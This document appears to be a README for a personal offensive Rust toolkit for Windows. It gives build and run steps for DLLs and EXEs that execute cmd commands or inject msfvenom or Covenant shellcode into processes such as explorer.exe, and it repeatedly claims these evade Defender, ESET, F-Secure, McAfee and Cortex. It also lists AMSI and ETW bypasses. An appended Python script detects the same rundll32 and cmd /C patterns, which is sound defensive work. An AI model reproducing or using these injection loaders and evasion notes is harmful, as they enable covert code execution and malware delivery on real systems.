This repository is inspired by several other Rust repositories and collects my own offensive Windows Rust cheatsheet and tooling. The whole project has been developed and cross-compiled on a Linux machine.

## 01_DLLs

You can find the following projects inside 01_DLLs/:

```
$ ls 01_DLLs
code_execution msgbox shellcode_CreateRemoteThread shellcode_CreateThread
```
### msgbox

Launches a simple Windows prompt (message box).

```
$ cd /01_DLLs/msgbox
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
```

This generates a .dll file with the exported function `exec`. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build deps examples incremental libmsgbox_dll.dll.a msgbox_dll.d msgbox_dll.dll
```

To run it on Windows:

```
C:\>rundll32 msgbox_dll.dll,exec
```
### code_execution

Executes commands from a new cmd process.

```
$ cd 01_DLLs/code_execution
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
```

This generates a .dll file with the exported function `exec`. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build code_execution_dll.d code_execution_dll.dll deps examples incremental libcode_execution_dll.dll.a
```

To run it on Windows:

```
C:\>rundll32 code_execution_dll.dll,exec
```

To change the purpose and/or the command executed by the DLL, open lib.rs, modify the following line and recompile:

```rust
let output = Command::new("cmd").args(&["/C", "calc.exe"]).output().expect("failed to execute process");
```

[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
### shellcode_CreateRemoteThread

Launches a shellcode inside a specific process. This example executes a shellcode generated by msfvenom that launches calc.exe.

```
$ cd 01_DLLs/shellcode_CreateRemoteThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
```

This generates a .dll file with the exported function `exec`. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build deps examples incremental libshellcodeshellcode_create_remote_thread_dll.dll.a shellcode_create_remote_thread_dll.d shellcode_create_remote_thread_dll.dll
```

To run it on Windows:

```
C:\>rundll32 shellcode_create_remote_thread_dll.dll,exec <process_name>
```

If no process name is specified, the shellcode is injected into the explorer.exe process by default.

AV DETECTIONS (with Covenant Grunt shellcode)

To change the purpose and/or shellcode of the DLL, open lib.rs, modify the following line and recompile:

```rust
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
```

If you also want to change the default process the shellcode is injected into, edit the following line in lib.rs and recompile:

```rust
let mut processname = "explorer.exe";
```

[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
### shellcode_CreateThread

Launches a shellcode inside the current process. This example executes a shellcode generated by msfvenom that launches calc.exe.

```
$ cd 01_DLLs/shellcode_CreateThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --lib --release
```

This generates a .dll file with the exported function `exec`. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build deps examples incremental libshellcode_createThread_dll.dll.a shellcode_createThread_dll.d shellcode_createThread_dll.dll
```

To run it on Windows:

```
C:\>rundll32 shellcode_createThread_dll.dll,exec
```

To change the purpose and/or shellcode of the DLL, open lib.rs, modify the following line and recompile:

```rust
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
```

NOTE: the array length in the type (276 here) must match the length of your shellcode.
## 02_EXEs

### msgbox

Launches a simple Windows prompt (message box).

```
$ cd /02_EXEs/msgbox
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
```

This generates a .exe file. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build deps examples incremental msgbox_exe.d msgbox_exe.exe
```

To run it on Windows:

```
C:\>msgbox_exe.exe
```
### code_execution

Executes commands from a new cmd process.

```
$ cd 02_EXEs/code_execution
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
```

This generates a .exe file. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build code_execution_exe.d code_execution_exe.exe deps examples incremental
```

To run it on Windows:

```
C:\>code_execution_exe.exe
```

To change the purpose and/or the command executed by the EXE, open main.rs, modify the following line and recompile:

```rust
let output = Command::new("cmd").args(&["/C", "calc.exe"]).output().expect("failed to execute process");
```

[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
### shellcode_CreateRemoteThread

Launches a shellcode inside a specific process. This example executes a shellcode generated by msfvenom that launches calc.exe.

```
$ cd 02_EXEs/shellcode_CreateRemoteThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
```

This generates a .exe file. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build deps examples incremental shellcode_create_remote_thread_exe.d shellcode_create_remote_thread_exe.exe
```

To run it on Windows:

```
C:\>shellcode_create_remote_thread_exe.exe <process_name>
```

If no process name is specified, the shellcode is injected into the explorer.exe process by default.

AV DETECTIONS (with Covenant Grunt shellcode)

To change the purpose and/or shellcode of the EXE, open main.rs, modify the following line and recompile:

```rust
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
```

If you also want to change the default process the shellcode is injected into, edit the following line in main.rs and recompile:

```rust
let mut processname = "explorer.exe";
```

[NO AV DETECTION (DEFENDER, ESET, FSECURE, MCAFEE, CORTEX) - 15/02/2022]
### shellcode_CreateThread

Launches a shellcode inside the current process. This example executes a shellcode generated by msfvenom that launches calc.exe.

```
$ cd 02_EXEs/shellcode_CreateThread
$ ls
Cargo.toml src
$ cargo build --target x86_64-pc-windows-gnu --release
```

This generates a .exe file. It is located at target/x86_64-pc-windows-gnu/release/:

```
$ ls
build deps examples incremental shellcode_createThread_exe.d shellcode_createThread_exe.exe
```

To run it on Windows:

```
C:\>shellcode_createThread_exe.exe
```

To change the purpose and/or shellcode of the EXE, open main.rs, modify the following line and recompile:

```rust
let shellcode:[u8;276] = [0xfc, 0x48, ... <blablabla>];
```

NOTE: the array length in the type (276 here) must match the length of your shellcode.
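Detection-side note, as an added example that is not part of this repository's code: every DLL variant above is invoked as `rundll32 <dll>,exec` (optionally followed by a process name), and the code_execution variants spawn `cmd /C ...` from the dropped binary. The Python below parses process-creation events with assumed Sysmon-style fields (Image, CommandLine, ParentImage; the sample events are constructed here) and flags exactly those shapes: a rundll32 DLL loaded by relative path or from outside Windows/Program Files, a trailing process-name argument, and `cmd /C` whose parent lives outside trusted directories.

```python
import re
from typing import Optional

# Directories whose binaries and DLLs are treated as trusted for this triage.
# Known gap (left deliberately simple): user-writable subfolders such as
# C:\Windows\Temp are covered by the C:\Windows\ prefix.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Matches "rundll32" or "rundll32.exe" (optionally with path and quotes), then
# "<dll>,<export>" and any trailing arguments (the CreateRemoteThread variant
# on this page takes a process name there).
RUNDLL32_RE = re.compile(
    r'^\s*"?(?:[^"\s\\]*\\)*rundll32(?:\.exe)?"?\s+'
    r'(?P<dll>"[^"]+"|[^\s,]+),(?P<export>\S+)'
    r'(?:\s+(?P<args>.*\S))?\s*$',
    re.IGNORECASE,
)

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\Users\bob\Downloads\msgbox_dll.dll,exec",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32 shellcode_create_remote_thread_dll.dll,exec explorer.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /C calc.exe",
     "ParentImage": r"C:\Users\bob\Downloads\code_execution_exe.exe"},
]


def classify_rundll32(command_line: str) -> Optional[dict]:
    """Parse a rundll32 command line; return a finding dict, or None if it is not rundll32."""
    m = RUNDLL32_RE.match(command_line)
    if not m:
        return None
    dll = m.group("dll").strip('"')
    export = m.group("export")
    args = m.group("args") or ""
    dll_lower = dll.lower()
    reasons = []
    if "\\" not in dll_lower:
        # "rundll32 msgbox_dll.dll,exec" resolves the DLL via the search path,
        # i.e. from the current directory of whoever launched it.
        reasons.append("relative DLL path (resolved from the current directory)")
    elif not dll_lower.startswith(TRUSTED_DIRS):
        reasons.append("DLL outside Windows/Program Files directories")
    if args.lower().endswith(".exe"):
        reasons.append("trailing argument names a process (possible injection target)")
    return {"dll": dll, "export": export, "args": args,
            "suspicious": bool(reasons), "reasons": reasons}


def classify_cmd_child(event: dict) -> Optional[dict]:
    """Flag cmd.exe /C launched by a parent binary outside the trusted directories."""
    if not event["Image"].lower().endswith("\\cmd.exe"):
        return None
    cmdline = event["CommandLine"]
    parent = event["ParentImage"].lower()
    reasons = []
    # Pad with spaces so "/C" is matched as a whole token wherever it sits.
    if re.search(r"\s/c\s", " " + cmdline + " ", re.IGNORECASE) and not parent.startswith(TRUSTED_DIRS):
        reasons.append("cmd /C spawned by a binary outside trusted directories")
    return {"parent": event["ParentImage"], "command": cmdline,
            "suspicious": bool(reasons), "reasons": reasons}


def triage(events: list) -> list:
    """Run both classifiers over process-creation events and return the suspicious findings."""
    findings = []
    for ev in events:
        image = ev["Image"].lower()
        finding = None
        if image.endswith("\\rundll32.exe"):
            finding = classify_rundll32(ev["CommandLine"])
        elif image.endswith("\\cmd.exe"):
            finding = classify_cmd_child(ev)
        if finding and finding["suspicious"]:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

The two classifiers are deliberately independent so each can be mapped to its own rule: the rundll32 one keys on where the DLL comes from rather than on the export name, so renaming `exec` does not evade it, and the cmd one keys on the parent path, which is what the `Command::new("cmd").args(&["/C", ...])` line above produces regardless of the command string.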
- AMSI Bypass
- ETW Bypass
- ETW Patch
- OpSec
- Hell'sGate Rust Implementation
Interesting links to other offensive Rust projects: